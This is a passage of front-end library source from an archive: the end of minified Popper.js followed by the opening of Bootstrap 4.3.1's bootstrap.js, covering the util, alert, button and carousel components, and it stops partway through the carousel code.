n=[0,0],r=-1!==['right','left'].indexOf(i),p=e.split(/(\+|\-)/).map(function(e){return e.trim()}),s=p.indexOf(T(p,function(e){return-1!==e.search(/,|\s/)}));p[s]&&-1===p[s].indexOf(',')&&console.warn('Offsets separated by white space(s) are deprecated, use a comma (,) instead.');var d=/\s*,\s*|\s+/,a=-1===s?[p]:[p.slice(0,s).concat([p[s].split(d)[0]]),[p[s].split(d)[1]].concat(p.slice(s+1))];return a=a.map(function(e,i){var n=(1===i?!r:r)?'height':'width',p=!1;return e.reduce(function(e,t){return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}function G(e,t){var o,i=t.offset,n=e.placement,r=e.offsets,p=r.popper,s=r.reference,d=n.split('-')[0];return o=U(+i)?[+i,0]:z(i,p,s,d),'left'===d?(p.top+=o[0],p.left-=o[1]):'right'===d?(p.top+=o[0],p.left+=o[1]):'top'===d?(p.left+=o[0],p.top-=o[1]):'bottom'===d&&(p.left+=o[0],p.top+=o[1]),e.popper=p,e}for(var _=Math.min,X=Math.floor,J=Math.max,Q='undefined'!=typeof window&&'undefined'!=typeof document,Z=['Edge','Trident','Firefox'],$=0,ee=0;ee<Z.length;ee+=1)if(Q&&0<=navigator.userAgent.indexOf(Z[ee])){$=1;break}var i,te=Q&&window.Promise,oe=te?function(e){var t=!1;return function(){t||(t=!0,window.Promise.resolve().then(function(){t=!1,e()}))}}:function(e){var t=!1;return function(){t||(t=!0,setTimeout(function(){t=!1,e()},$))}},ie=function(){return void 0==i&&(i=-1!==navigator.appVersion.indexOf('MSIE 10')),i},ne=function(e,t){if(!(e instanceof t))throw new TypeError('Cannot call a class as a function')},re=function(){function e(e,t){for(var o,n=0;n<t.length;n++)o=t[n],o.enumerable=o.enumerable||!1,o.configurable=!0,'value'in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}return function(t,o,i){return o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[o],t)Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i]);return e},de=['auto-start','auto','auto-end','top-start','top','top-end','right-start','right','right-end','bottom-end','bottom','bottom-start','left-end','left','left-start'],ae=de.slice(3),le={FLIP:'flip',CLOCKWISE:'clockwise',COUNTERCLOCKWISE:'counterclockwise'},fe=function(){function t(o,i){var n=this,r=2<arguments.length&&void 0!==arguments[2]?arguments[2]:{};ne(this,t),this.scheduleUpdate=function(){return requestAnimationFrame(n.update)},this.update=oe(this.update.bind(this)),this.options=se({},t.Defaults,r),this.state={isDestroyed:!1,isCreated:!1,scrollParents:[]},this.reference=o&&o.jquery?o[0]:o,this.popper=i&&i.jquery?i[0]:i,this.options.modifiers={},Object.keys(se({},t.Defaults.modifiers,r.modifiers)).forEach(function(e){n.options.modifiers[e]=se({},t.Defaults.modifiers[e]||{},r.modifiers?r.modifiers[e]:{})}),this.modifiers=Object.keys(this.options.modifiers).map(function(e){return se({name:e},n.options.modifiers[e])}).sort(function(e,t){return e.order-t.order}),this.modifiers.forEach(function(t){t.enabled&&e(t.onLoad)&&t.onLoad(n.reference,n.popper,n.options,t,n.state)}),this.update();var p=this.options.eventsEnabled;p&&this.enableEventListeners(),this.state.eventsEnabled=p}return re(t,[{key:'update',value:function(){return N.call(this)}},{key:'destroy',value:function(){return P.call(this)}},{key:'enableEventListeners',value:function(){return I.call(this)}},{key:'disableEventListeners',value:function(){return R.call(this)}}]),t}();return fe.Utils=('undefined'==typeof window?global:window).PopperUtils,fe.placements=de,fe.Defaults={placement:'bottom',eventsEnabled:!0,removeOnDestroy:!1,onCreate:function(){},onUpdate:function(){},modifiers:{shift:{order:100,enabled:!0,fn:function(e){var t=e.placement,o=t.split('-')[0],i=t.split('-')[1];if(i){var n=e.offsets,r=n.reference,p=n.popper,s=-1!==['bottom','top'].indexOf(o),d=s?'left':'top',a=s?'width':'height',l={start:pe({},d,r[d]),end:pe({},d,r[d]+r[a]-p[a])};e.offsets.popper=se({},p,l[i])}return e}},offset:{order:200,enabled:!0,fn:G,offset:0},preventOverflow:{order:300,enabled:!0,fn:function(e,t){var o=t.boundariesElement||r(e.instance.popper);e.instance.reference===o&&(o=r(o));var i=y(e.instance.popper,e.instance.reference,t.padding,o);t.boundaries=i;var n=t.priority,p=e.offsets.popper,s={primary:function(e){var o=p[e];return p[e]<i[e]&&!t.escapeWithReference&&(o=J(p[e],i[e])),pe({},e,o)},secondary:function(e){var o='right'===e?'left':'top',n=p[o];return p[e]>i[e]&&!t.escapeWithReference&&(n=_(p[o],i[e]-('right'===e?p.width:p.height))),pe({},o,n)}};return n.forEach(function(e){var t=-1===['left','top'].indexOf(e)?'secondary':'primary';p=se({},p,s[t](e))}),e.offsets.popper=p,e},priority:['left','right','top','bottom'],padding:5,boundariesElement:'scrollParent'},keepTogether:{order:400,enabled:!0,fn:function(e){var t=e.offsets,o=t.popper,i=t.reference,n=e.placement.split('-')[0],r=X,p=-1!==['top','bottom'].indexOf(n),s=p?'right':'bottom',d=p?'left':'top',a=p?'width':'height';return o[s]<r(i[d])&&(e.offsets.popper[d]=r(i[d])-o[a]),o[d]>r(i[s])&&(e.offsets.popper[d]=r(i[s])),e}},arrow:{order:500,enabled:!0,fn:function(e,o){var i;if(!F(e.instance.modifiers,'arrow','keepTogether'))return e;var n=o.element;if('string'==typeof n){if(n=e.instance.popper.querySelector(n),!n)return e;}else if(!e.instance.popper.contains(n))return console.warn('WARNING: `arrow.element` must be child of its popper element!'),e;var r=e.placement.split('-')[0],p=e.offsets,s=p.popper,d=p.reference,a=-1!==['left','right'].indexOf(r),l=a?'height':'width',f=a?'Top':'Left',m=f.toLowerCase(),h=a?'left':'top',g=a?'bottom':'right',u=L(n)[l];d[g]-u<s[m]&&(e.offsets.popper[m]-=s[m]-(d[g]-u)),d[m]+u>s[g]&&(e.offsets.popper[m]+=d[m]+u-s[g]),e.offsets.popper=c(e.offsets.popper);var b=d[m]+d[l]/2-u/2,w=t(e.instance.popper),y=parseFloat(w['margin'+f],10),E=parseFloat(w['border'+f+'Width'],10),v=b-e.offsets.popper[m]-y-E;return v=J(_(s[l]-u,v),0),e.arrowElement=n,e.offsets.arrow=(i={},pe(i,m,Math.round(v)),pe(i,h,''),i),e},element:'[x-arrow]'},flip:{order:600,enabled:!0,fn:function(e,t){if(k(e.instance.modifiers,'inner'))return e;if(e.flipped&&e.placement===e.originalPlacement)return e;var o=y(e.instance.popper,e.instance.reference,t.padding,t.boundariesElement),i=e.placement.split('-')[0],n=x(i),r=e.placement.split('-')[1]||'',p=[];switch(t.behavior){case le.FLIP:p=[i,n];break;case le.CLOCKWISE:p=q(i);break;case le.COUNTERCLOCKWISE:p=q(i,!0);break;default:p=t.behavior;}return p.forEach(function(s,d){if(i!==s||p.length===d+1)return e;i=e.placement.split('-')[0],n=x(i);var a=e.offsets.popper,l=e.offsets.reference,f=X,m='left'===i&&f(a.right)>f(l.left)||'right'===i&&f(a.left)<f(l.right)||'top'===i&&f(a.bottom)>f(l.top)||'bottom'===i&&f(a.top)<f(l.bottom),h=f(a.left)<f(o.left),c=f(a.right)>f(o.right),g=f(a.top)<f(o.top),u=f(a.bottom)>f(o.bottom),b='left'===i&&h||'right'===i&&c||'top'===i&&g||'bottom'===i&&u,w=-1!==['top','bottom'].indexOf(i),y=!!t.flipVariations&&(w&&'start'===r&&h||w&&'end'===r&&c||!w&&'start'===r&&g||!w&&'end'===r&&u);(m||b||y)&&(e.flipped=!0,(m||b)&&(i=p[d+1]),y&&(r=K(r)),e.placement=i+(r?'-'+r:''),e.offsets.popper=se({},e.offsets.popper,S(e.instance.popper,e.offsets.reference,e.placement)),e=C(e.instance.modifiers,e,'flip'))}),e},behavior:'flip',padding:5,boundariesElement:'viewport'},inner:{order:700,enabled:!1,fn:function(e){var t=e.placement,o=t.split('-')[0],i=e.offsets,n=i.popper,r=i.reference,p=-1!==['left','right'].indexOf(o),s=-1===['top','left'].indexOf(o);return n[p?'left':'top']=r[o]-(s?n[p?'width':'height']:0),e.placement=x(t),e.offsets.popper=c(n),e}},hide:{order:800,enabled:!0,fn:function(e){if(!F(e.instance.modifiers,'hide','preventOverflow'))return e;var t=e.offsets.reference,o=T(e.instance.modifiers,function(e){return'preventOverflow'===e.name}).boundaries;if(t.bottom<o.top||t.left>o.right||t.top>o.bottom||t.right<o.left){if(!0===e.hide)return e;e.hide=!0,e.attributes['x-out-of-boundaries']=''}else{if(!1===e.hide)return e;e.hide=!1,e.attributes['x-out-of-boundaries']=!1}return e}},computeStyle:{order:850,enabled:!0,fn:function(e,t){var o=t.x,i=t.y,n=e.offsets.popper,p=T(e.instance.modifiers,function(e){return'applyStyle'===e.name}).gpuAcceleration;void 0!==p&&console.warn('WARNING: `gpuAcceleration` option moved to `computeStyle` modifier and will not be supported in future versions of Popper.js!');var s,d,a=void 0===p?t.gpuAcceleration:p,l=r(e.instance.popper),f=g(l),m={position:n.position},h={left:X(n.left),top:X(n.top),bottom:X(n.bottom),right:X(n.right)},c='bottom'===o?'top':'bottom',u='right'===i?'left':'right',b=W('transform');if(d='bottom'==c?-f.height+h.bottom:h.top,s='right'==u?-f.width+h.right:h.left,a&&b)m[b]='translate3d('+s+'px, '+d+'px, 0)',m[c]=0,m[u]=0,m.willChange='transform';else{var w='bottom'==c?-1:1,y='right'==u?-1:1;m[c]=d*w,m[u]=s*y,m.willChange=c+', '+u}var E={"x-placement":e.placement};return e.attributes=se({},E,e.attributes),e.styles=se({},m,e.styles),e.arrowStyles=se({},e.offsets.arrow,e.arrowStyles),e},gpuAcceleration:!0,x:'bottom',y:'right'},applyStyle:{order:900,enabled:!0,fn:function(e){return Y(e.instance.popper,e.styles),j(e.instance.popper,e.attributes),e.arrowElement&&Object.keys(e.arrowStyles).length&&Y(e.arrowElement,e.arrowStyles),e},onLoad:function(e,t,o,i,n){var r=O(n,t,e),p=v(o.placement,r,t,e,o.modifiers.flip.boundariesElement,o.modifiers.flip.padding);return t.setAttribute('x-placement',p),Y(t,{position:'absolute'}),o},gpuAcceleration:void 0}}},fe});
//# sourceMappingURL=popper.min.js.map
PK!|-Ϛ55bootstrap/js/bootstrap.jsnu&1i�/*!
  * Bootstrap v4.3.1 (https://getbootstrap.com/)
  * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
  * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
  */
(function (global, factory) {
  typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports, require('jquery'), require('popper.js')) :
  typeof define === 'function' && define.amd ? define(['exports', 'jquery', 'popper.js'], factory) :
  (global = global || self, factory(global.bootstrap = {}, global.jQuery, global.Popper));
}(this, function (exports, $, Popper) { 'use strict';

  $ = $ && $.hasOwnProperty('default') ? $['default'] : $;
  Popper = Popper && Popper.hasOwnProperty('default') ? Popper['default'] : Popper;

  function _defineProperties(target, props) {
    for (var i = 0; i < props.length; i++) {
      var descriptor = props[i];
      descriptor.enumerable = descriptor.enumerable || false;
      descriptor.configurable = true;
      if ("value" in descriptor) descriptor.writable = true;
      Object.defineProperty(target, descriptor.key, descriptor);
    }
  }

  function _createClass(Constructor, protoProps, staticProps) {
    if (protoProps) _defineProperties(Constructor.prototype, protoProps);
    if (staticProps) _defineProperties(Constructor, staticProps);
    return Constructor;
  }

  function _defineProperty(obj, key, value) {
    if (key in obj) {
      Object.defineProperty(obj, key, {
        value: value,
        enumerable: true,
        configurable: true,
        writable: true
      });
    } else {
      obj[key] = value;
    }

    return obj;
  }

  function _objectSpread(target) {
    for (var i = 1; i < arguments.length; i++) {
      var source = arguments[i] != null ? arguments[i] : {};
      var ownKeys = Object.keys(source);

      if (typeof Object.getOwnPropertySymbols === 'function') {
        ownKeys = ownKeys.concat(Object.getOwnPropertySymbols(source).filter(function (sym) {
          return Object.getOwnPropertyDescriptor(source, sym).enumerable;
        }));
      }

      ownKeys.forEach(function (key) {
        _defineProperty(target, key, source[key]);
      });
    }

    return target;
  }

  function _inheritsLoose(subClass, superClass) {
    subClass.prototype = Object.create(superClass.prototype);
    subClass.prototype.constructor = subClass;
    subClass.__proto__ = superClass;
  }

  /**
   * --------------------------------------------------------------------------
   * Bootstrap (v4.3.1): util.js
   * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
   * --------------------------------------------------------------------------
   */
  /**
   * ------------------------------------------------------------------------
   * Private TransitionEnd Helpers
   * ------------------------------------------------------------------------
   */

  var TRANSITION_END = 'transitionend';
  var MAX_UID = 1000000;
  var MILLISECONDS_MULTIPLIER = 1000; // Shoutout AngusCroll (https://goo.gl/pxwQGp)

  function toType(obj) {
    return {}.toString.call(obj).match(/\s([a-z]+)/i)[1].toLowerCase();
  }

  function getSpecialTransitionEndEvent() {
    return {
      bindType: TRANSITION_END,
      delegateType: TRANSITION_END,
      handle: function handle(event) {
        if ($(event.target).is(this)) {
          return event.handleObj.handler.apply(this, arguments); // eslint-disable-line prefer-rest-params
        }

        return undefined; // eslint-disable-line no-undefined
      }
    };
  }

  function transitionEndEmulator(duration) {
    var _this = this;

    var called = false;
    $(this).one(Util.TRANSITION_END, function () {
      called = true;
    });
    setTimeout(function () {
      if (!called) {
        Util.triggerTransitionEnd(_this);
      }
    }, duration);
    return this;
  }

  function setTransitionEndSupport() {
    $.fn.emulateTransitionEnd = transitionEndEmulator;
    $.event.special[Util.TRANSITION_END] = getSpecialTransitionEndEvent();
  }
  /**
   * --------------------------------------------------------------------------
   * Public Util Api
   * --------------------------------------------------------------------------
   */


  var Util = {
    TRANSITION_END: 'bsTransitionEnd',
    getUID: function getUID(prefix) {
      do {
        // eslint-disable-next-line no-bitwise
        prefix += ~~(Math.random() * MAX_UID); // "~~" acts like a faster Math.floor() here
      } while (document.getElementById(prefix));

      return prefix;
    },
    getSelectorFromElement: function getSelectorFromElement(element) {
      var selector = element.getAttribute('data-target');

      if (!selector || selector === '#') {
        var hrefAttr = element.getAttribute('href');
        selector = hrefAttr && hrefAttr !== '#' ? hrefAttr.trim() : '';
      }

      try {
        return document.querySelector(selector) ? selector : null;
      } catch (err) {
        return null;
      }
    },
    getTransitionDurationFromElement: function getTransitionDurationFromElement(element) {
      if (!element) {
        return 0;
      } // Get transition-duration of the element


      var transitionDuration = $(element).css('transition-duration');
      var transitionDelay = $(element).css('transition-delay');
      var floatTransitionDuration = parseFloat(transitionDuration);
      var floatTransitionDelay = parseFloat(transitionDelay); // Return 0 if element or transition duration is not found

      if (!floatTransitionDuration && !floatTransitionDelay) {
        return 0;
      } // If multiple durations are defined, take the first


      transitionDuration = transitionDuration.split(',')[0];
      transitionDelay = transitionDelay.split(',')[0];
      return (parseFloat(transitionDuration) + parseFloat(transitionDelay)) * MILLISECONDS_MULTIPLIER;
    },
    reflow: function reflow(element) {
      return element.offsetHeight;
    },
    triggerTransitionEnd: function triggerTransitionEnd(element) {
      $(element).trigger(TRANSITION_END);
    },
    // TODO: Remove in v5
    supportsTransitionEnd: function supportsTransitionEnd() {
      return Boolean(TRANSITION_END);
    },
    isElement: function isElement(obj) {
      return (obj[0] || obj).nodeType;
    },
    typeCheckConfig: function typeCheckConfig(componentName, config, configTypes) {
      for (var property in configTypes) {
        if (Object.prototype.hasOwnProperty.call(configTypes, property)) {
          var expectedTypes = configTypes[property];
          var value = config[property];
          var valueType = value && Util.isElement(value) ? 'element' : toType(value);

          if (!new RegExp(expectedTypes).test(valueType)) {
            throw new Error(componentName.toUpperCase() + ": " + ("Option \"" + property + "\" provided type \"" + valueType + "\" ") + ("but expected type \"" + expectedTypes + "\"."));
          }
        }
      }
    },
    findShadowRoot: function findShadowRoot(element) {
      if (!document.documentElement.attachShadow) {
        return null;
      } // Can find the shadow root otherwise it'll return the document


      if (typeof element.getRootNode === 'function') {
        var root = element.getRootNode();
        return root instanceof ShadowRoot ? root : null;
      }

      if (element instanceof ShadowRoot) {
        return element;
      } // when we don't find a shadow root


      if (!element.parentNode) {
        return null;
      }

      return Util.findShadowRoot(element.parentNode);
    }
  };
  setTransitionEndSupport();

  /**
   * ------------------------------------------------------------------------
   * Constants
   * ------------------------------------------------------------------------
   */

  var NAME = 'alert';
  var VERSION = '4.3.1';
  var DATA_KEY = 'bs.alert';
  var EVENT_KEY = "." + DATA_KEY;
  var DATA_API_KEY = '.data-api';
  var JQUERY_NO_CONFLICT = $.fn[NAME];
  var Selector = {
    DISMISS: '[data-dismiss="alert"]'
  };
  var Event = {
    CLOSE: "close" + EVENT_KEY,
    CLOSED: "closed" + EVENT_KEY,
    CLICK_DATA_API: "click" + EVENT_KEY + DATA_API_KEY
  };
  var ClassName = {
    ALERT: 'alert',
    FADE: 'fade',
    SHOW: 'show'
    /**
     * ------------------------------------------------------------------------
     * Class Definition
     * ------------------------------------------------------------------------
     */

  };

  var Alert =
  /*#__PURE__*/
  function () {
    function Alert(element) {
      this._element = element;
    } // Getters


    var _proto = Alert.prototype;

    // Public
    _proto.close = function close(element) {
      var rootElement = this._element;

      if (element) {
        rootElement = this._getRootElement(element);
      }

      var customEvent = this._triggerCloseEvent(rootElement);

      if (customEvent.isDefaultPrevented()) {
        return;
      }

      this._removeElement(rootElement);
    };

    _proto.dispose = function dispose() {
      $.removeData(this._element, DATA_KEY);
      this._element = null;
    } // Private
    ;

    _proto._getRootElement = function _getRootElement(element) {
      var selector = Util.getSelectorFromElement(element);
      var parent = false;

      if (selector) {
        parent = document.querySelector(selector);
      }

      if (!parent) {
        parent = $(element).closest("." + ClassName.ALERT)[0];
      }

      return parent;
    };

    _proto._triggerCloseEvent = function _triggerCloseEvent(element) {
      var closeEvent = $.Event(Event.CLOSE);
      $(element).trigger(closeEvent);
      return closeEvent;
    };

    _proto._removeElement = function _removeElement(element) {
      var _this = this;

      $(element).removeClass(ClassName.SHOW);

      if (!$(element).hasClass(ClassName.FADE)) {
        this._destroyElement(element);

        return;
      }

      var transitionDuration = Util.getTransitionDurationFromElement(element);
      $(element).one(Util.TRANSITION_END, function (event) {
        return _this._destroyElement(element, event);
      }).emulateTransitionEnd(transitionDuration);
    };

    _proto._destroyElement = function _destroyElement(element) {
      $(element).detach().trigger(Event.CLOSED).remove();
    } // Static
    ;

    Alert._jQueryInterface = function _jQueryInterface(config) {
      return this.each(function () {
        var $element = $(this);
        var data = $element.data(DATA_KEY);

        if (!data) {
          data = new Alert(this);
          $element.data(DATA_KEY, data);
        }

        if (config === 'close') {
          data[config](this);
        }
      });
    };

    Alert._handleDismiss = function _handleDismiss(alertInstance) {
      return function (event) {
        if (event) {
          event.preventDefault();
        }

        alertInstance.close(this);
      };
    };

    _createClass(Alert, null, [{
      key: "VERSION",
      get: function get() {
        return VERSION;
      }
    }]);

    return Alert;
  }();
  /**
   * ------------------------------------------------------------------------
   * Data Api implementation
   * ------------------------------------------------------------------------
   */


  $(document).on(Event.CLICK_DATA_API, Selector.DISMISS, Alert._handleDismiss(new Alert()));
  /**
   * ------------------------------------------------------------------------
   * jQuery
   * ------------------------------------------------------------------------
   */

  $.fn[NAME] = Alert._jQueryInterface;
  $.fn[NAME].Constructor = Alert;

  $.fn[NAME].noConflict = function () {
    $.fn[NAME] = JQUERY_NO_CONFLICT;
    return Alert._jQueryInterface;
  };

  /**
   * ------------------------------------------------------------------------
   * Constants
   * ------------------------------------------------------------------------
   */

  var NAME$1 = 'button';
  var VERSION$1 = '4.3.1';
  var DATA_KEY$1 = 'bs.button';
  var EVENT_KEY$1 = "." + DATA_KEY$1;
  var DATA_API_KEY$1 = '.data-api';
  var JQUERY_NO_CONFLICT$1 = $.fn[NAME$1];
  var ClassName$1 = {
    ACTIVE: 'active',
    BUTTON: 'btn',
    FOCUS: 'focus'
  };
  var Selector$1 = {
    DATA_TOGGLE_CARROT: '[data-toggle^="button"]',
    DATA_TOGGLE: '[data-toggle="buttons"]',
    INPUT: 'input:not([type="hidden"])',
    ACTIVE: '.active',
    BUTTON: '.btn'
  };
  var Event$1 = {
    CLICK_DATA_API: "click" + EVENT_KEY$1 + DATA_API_KEY$1,
    FOCUS_BLUR_DATA_API: "focus" + EVENT_KEY$1 + DATA_API_KEY$1 + " " + ("blur" + EVENT_KEY$1 + DATA_API_KEY$1)
    /**
     * ------------------------------------------------------------------------
     * Class Definition
     * ------------------------------------------------------------------------
     */

  };

  var Button =
  /*#__PURE__*/
  function () {
    function Button(element) {
      this._element = element;
    } // Getters


    var _proto = Button.prototype;

    // Public
    _proto.toggle = function toggle() {
      var triggerChangeEvent = true;
      var addAriaPressed = true;
      var rootElement = $(this._element).closest(Selector$1.DATA_TOGGLE)[0];

      if (rootElement) {
        var input = this._element.querySelector(Selector$1.INPUT);

        if (input) {
          if (input.type === 'radio') {
            if (input.checked && this._element.classList.contains(ClassName$1.ACTIVE)) {
              triggerChangeEvent = false;
            } else {
              var activeElement = rootElement.querySelector(Selector$1.ACTIVE);

              if (activeElement) {
                $(activeElement).removeClass(ClassName$1.ACTIVE);
              }
            }
          }

          if (triggerChangeEvent) {
            if (input.hasAttribute('disabled') || rootElement.hasAttribute('disabled') || input.classList.contains('disabled') || rootElement.classList.contains('disabled')) {
              return;
            }

            input.checked = !this._element.classList.contains(ClassName$1.ACTIVE);
            $(input).trigger('change');
          }

          input.focus();
          addAriaPressed = false;
        }
      }

      if (addAriaPressed) {
        this._element.setAttribute('aria-pressed', !this._element.classList.contains(ClassName$1.ACTIVE));
      }

      if (triggerChangeEvent) {
        $(this._element).toggleClass(ClassName$1.ACTIVE);
      }
    };

    _proto.dispose = function dispose() {
      $.removeData(this._element, DATA_KEY$1);
      this._element = null;
    } // Static
    ;

    Button._jQueryInterface = function _jQueryInterface(config) {
      return this.each(function () {
        var data = $(this).data(DATA_KEY$1);

        if (!data) {
          data = new Button(this);
          $(this).data(DATA_KEY$1, data);
        }

        if (config === 'toggle') {
          data[config]();
        }
      });
    };

    _createClass(Button, null, [{
      key: "VERSION",
      get: function get() {
        return VERSION$1;
      }
    }]);

    return Button;
  }();
  /**
   * ------------------------------------------------------------------------
   * Data Api implementation
   * ------------------------------------------------------------------------
   */


  $(document).on(Event$1.CLICK_DATA_API, Selector$1.DATA_TOGGLE_CARROT, function (event) {
    event.preventDefault();
    var button = event.target;

    if (!$(button).hasClass(ClassName$1.BUTTON)) {
      button = $(button).closest(Selector$1.BUTTON);
    }

    Button._jQueryInterface.call($(button), 'toggle');
  }).on(Event$1.FOCUS_BLUR_DATA_API, Selector$1.DATA_TOGGLE_CARROT, function (event) {
    var button = $(event.target).closest(Selector$1.BUTTON)[0];
    $(button).toggleClass(ClassName$1.FOCUS, /^focus(in)?$/.test(event.type));
  });
  /**
   * ------------------------------------------------------------------------
   * jQuery
   * ------------------------------------------------------------------------
   */

  $.fn[NAME$1] = Button._jQueryInterface;
  $.fn[NAME$1].Constructor = Button;

  $.fn[NAME$1].noConflict = function () {
    $.fn[NAME$1] = JQUERY_NO_CONFLICT$1;
    return Button._jQueryInterface;
  };

  /**
   * ------------------------------------------------------------------------
   * Constants
   * ------------------------------------------------------------------------
   */

  var NAME$2 = 'carousel';
  var VERSION$2 = '4.3.1';
  var DATA_KEY$2 = 'bs.carousel';
  var EVENT_KEY$2 = "." + DATA_KEY$2;
  var DATA_API_KEY$2 = '.data-api';
  var JQUERY_NO_CONFLICT$2 = $.fn[NAME$2];
  var ARROW_LEFT_KEYCODE = 37; // KeyboardEvent.which value for left arrow key

  var ARROW_RIGHT_KEYCODE = 39; // KeyboardEvent.which value for right arrow key

  var TOUCHEVENT_COMPAT_WAIT = 500; // Time for mouse compat events to fire after touch

  var SWIPE_THRESHOLD = 40;
  var Default = {
    interval: 5000,
    keyboard: true,
    slide: false,
    pause: 'hover',
    wrap: true,
    touch: true
  };
  var DefaultType = {
    interval: '(number|boolean)',
    keyboard: 'boolean',
    slide: '(boolean|string)',
    pause: '(string|boolean)',
    wrap: 'boolean',
    touch: 'boolean'
  };
  var Direction = {
    NEXT: 'next',
    PREV: 'prev',
    LEFT: 'left',
    RIGHT: 'right'
  };
  var Event$2 = {
    SLIDE: "slide" + EVENT_KEY$2,
    SLID: "slid" + EVENT_KEY$2,
    KEYDOWN: "keydown" + EVENT_KEY$2,
    MOUSEENTER: "mouseenter" + EVENT_KEY$2,
    MOUSELEAVE: "mouseleave" + EVENT_KEY$2,
    TOUCHSTART: "touchstart" + EVENT_KEY$2,
    TOUCHMOVE: "touchmove" + EVENT_KEY$2,
    TOUCHEND: "touchend" + EVENT_KEY$2,
    POINTERDOWN: "pointerdown" + EVENT_KEY$2,
    POINTERUP: "pointerup" + EVENT_KEY$2,
    DRAG_START: "dragstart" + EVENT_KEY$2,
    LOAD_DATA_API: "load" + EVENT_KEY$2 + DATA_API_KEY$2,
    CLICK_DATA_API: "click" + EVENT_KEY$2 + DATA_API_KEY$2
  };
  var ClassName$2 = {
    CAROUSEL: 'carousel',
    ACTIVE: 'active',
    SLIDE: 'slide',
    RIGHT: 'carousel-item-right',
    LEFT: 'carousel-item-left',
    NEXT: 'carousel-item-next',
    PREV: 'carousel-item-prev',
    ITEM: 'carousel-item',
    POINTER_EVENT: 'pointer-event'
  };
  var Selector$2 = {
    ACTIVE: '.active',
    ACTIVE_ITEM: '.active.carousel-item',
    ITEM: '.carousel-item',
    ITEM_IMG: '.carousel-item img',
    NEXT_PREV: '.carousel-item-next, .carousel-item-prev',
    INDICATORS: '.carousel-indicators',
    DATA_SLIDE: '[data-slide], [data-slide-to]',
    DATA_RIDE: '[data-ride="carousel"]'
  };
  var PointerType = {
    TOUCH: 'touch',
    PEN: 'pen'
    /**
     * ------------------------------------------------------------------------
     * Class Definition
     * ------------------------------------------------------------------------
     */

  };

  var Carousel =
  /*#__PURE__*/
  function () {
    function Carousel(element, config) {
      this._items = null;
      this._interval = null;
      this._activeElement = null;
      this._isPaused = false;
      this._isSliding = false;
      this.touchTimeout = null;
      this.touchStartX = 0;
      this.touchDeltaX = 0;
      this._config = this._getConfig(config);
      this._element = element;
      this._indicatorsElement = this._element.querySelector(Selector$2.INDICATORS);
      this._touchSupported = 'ontouchstart' in document.documentElement || navigator.maxTouchPoints > 0;
      this._pointerEvent = Boolean(window.PointerEvent || window.MSPointerEvent);

      this._addEventListeners();
    } // Getters


    var _proto = Carousel.prototype;

    // Public
    _proto.next = function next() {
      if (!this._isSliding) {
        this._slide(Direction.NEXT);
      }
    };

    _proto.nextWhenVisible = function nextWhenVisible() {
      // Don't call next when the page isn't visible
      // or the carousel or its parent isn't visible
      if (!document.hidden && $(this._element).is(':visible') && $(this._element).css('visibility') !== 'hidden') {
        this.next();
      }
    };

    _proto.prev = function prev() {
      if (!this._isSliding) {
        this._slide(Direction.PREV);
      }
    };

    _proto.pause = function pause(event) {
      if (!event) {
        this._isPaused = true;
      }

      if (this._element.querySelector(Selector$2.NEXT_PREV)) {
        Util.triggerTransitionEnd(this._element);
        this.cycle(true);
      }

      clearInterval(this._interval);
      this._interval = null;
    };

    _proto.cycle = function cycle(event) {
      if (!event) {
        this._isPaused = false;
      }

      if (this._interval) {
        clearInterval(this._interval);
        this._interval = null;
      }

      if (this._config.interval && !this._isPaused) {
        this._interval = setInterval((document.visibilityState ? this.nextWhenVisible : this.next).bind(this), this._config.interval);
      }
    };

    _proto.to = function to(index) {
      var _this = this;

      this._activeElement = this._element.querySelector(Selector$2.ACTIVE_ITEM);

      var activeIndex = this._getItemIndex(this._activeElement);

      if (index > this._items.length - 1 || index < 0) {
        return;
      }

      if (this._isSliding) {
        $(this._element).one(Event$2.SLID, function () {
          return _this.to(index);
        });
        return;
      }

      if (activeIndex === index) {
        this.pause();
        this.cycle();
        return;
      }

      var direction = index > activeIndex ? Direction.NEXT : Direction.PREV;

      this._slide(direction, this._items[index]);
    };

    _proto.dispose = function dispose() {
      $(this._element).off(EVENT_KEY$2);
      $.removeData(this._element, DATA_KEY$2);
      this._items = null;
      this._config = null;
      this._element = null;
      this._interval = null;
      this._isPaused = null;
      this._isSliding = null;
      this._activeElement = null;
      this._indicatorsElement = null;
    } // Private
    ;

    _proto._getConfig = function _getConfig(config) {
      config = _objectSpread({}, Default, config);
      Util.typeCheckConfig(NAME$2, config, DefaultType);
      return config;
    };

    _proto._handleSwipe = function _handleSwipe() {
      var absDeltax = Math.abs(this.touchDeltaX);

      if (absDeltax <= SWIPE_THRESHOLD) {
        return;
      }

      var direction = absDeltax / this.touchDeltaX; // swipe left

      if (direction > 0) {
        this.prev();
      } // swipe right


      if (direction < 0) {
        this.next();
      }
    };

    _proto._addEventListeners = function _addEventListeners() {
      var _this2 = this;

      if (this._config.keyboard) {
        $(this._element).on(Event$2.KEYDOWN, function (event) {
          return _this2._keydown(event);
        });
      }

      if (this._config.pause === 'hover') {
        $(this._element).on(Event$2.MOUSEENTER, function (event) {
          return _this2.pause(event);
        }).on(Event$2.MOUSELEAVE, function (event) {
          return _this2.cycle(event);
        });
      }

      if (this._config.touch) {
        this._addTouchEventListeners();
      }
    };

    _proto._addTouchEventListeners = function _addTouchEventListeners() {
      var _this3 = this;

      if (!this._touchSupported) {
        return;
      }

      var start = function start(event) {
        if (_this3._pointerEvent && PointerType[event.originalEvent.pointerType.toUpperCase()]) {
          _this3.touchStartX = event.originalEvent.clientX;
        } else if (!_this3._pointerEvent) {
          _this3.touchStartX = event.originalEvent.touches[0].clientX;
        }
      };

      var move = function move(event) {
